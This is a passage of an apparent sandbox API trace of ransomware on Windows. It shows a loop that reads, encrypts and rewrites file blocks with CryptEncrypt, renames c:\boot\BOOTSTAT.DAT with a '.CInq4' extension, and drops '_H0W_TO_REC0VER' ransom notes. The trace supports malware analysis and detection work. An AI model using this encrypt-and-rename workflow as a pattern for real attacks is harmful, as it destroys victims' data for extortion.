lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.232] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.232] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.233] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.233] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.233] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.233] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.233] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.233] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.235] CloseHandle (hObject=0xb8) returned 1 [0040.235] CloseHandle (hObject=0xc4) returned 1 [0040.236] GetCurrentThreadId () returned 0xa80 [0040.236] GetCurrentThreadId () returned 0xa80 [0040.236] MoveFileW (lpExistingFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="c:\\boot\\BOOTSTAT.DAT.CInq4" (normalized: "c:\\boot\\bootstat.dat.cinq4")) returned 1 [0040.236] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_CInq4.txt" (normalized: "c:\\boot\\(_h0w_to_rec0ver_cinq4.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.237] CloseHandle (hObject=0xc4) returned 1 [0040.238] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_CInq4.html" (normalized: "c:\\boot\\(_h0w_to_rec0ver_cinq4.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.238] WriteFile (in: hFile=0xc4, lpBuffer=0x391e50*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x391e50*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.239] CloseHandle (hObject=0xc4) returned 1 [0040.239] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_CInq4.url" (normalized: "c:\\boot\\(_h0w_to_rec0ver_cinq4.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.251] WriteFile (in: hFile=0xc4, lpBuffer=0x379dc0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x379dc0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.252] CloseHandle (hObject=0xc4) returned 1 [0040.252] CreateFileW (lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.252] CreateFileW (lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0040.252] CloseHandle (hObject=0xc4) returned 1 [0040.252] CloseHandle (hObject=0xffffffff) returned 0 [0040.253] CreateFileW (lpFileName="c:\\boot\\cs-cz\\(_H0W_TO_REC0VER_CInq4.txt" (normalized: "c:\\boot\\cs-cz\\(_h0w_to_rec0ver_cinq4.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0040.253] WriteFile (in: hFile=0xc4, lpBuffer=0x391908*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x391908*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.254] CloseHandle (hObject=0xc4) returned 1 [0040.254] CreateFileW (lpFileName="c:\\boot\\cs-cz\\(_H0W_TO_REC0VER_CInq4.html" (normalized: "c:\\boot\\cs-cz\\(_h0w_to_rec0ver_cinq4.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0040.281] WriteFile (in: hFile=0xcc, lpBuffer=0x391e50*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x391e50*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.283] WriteFile (in: hFile=0xcc, lpBuffer=0x379dc0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x379dc0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.284] WriteFile (in: hFile=0xcc, lpBuffer=0x391908*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x391908*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.287] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.288] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.290] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.292] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.294] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.296] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.313] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.314] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.317] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.318] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.320] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.321] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.334] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.335] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.337] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.358] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.359] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.361] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.378] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.380] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.382] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.385] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.386] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.388] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.390] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.392] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.393] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.417] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.419] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.421] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.424] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.426] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.428] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.431] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.432] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.434] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.461] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.463] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.465] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.499] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.501] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, 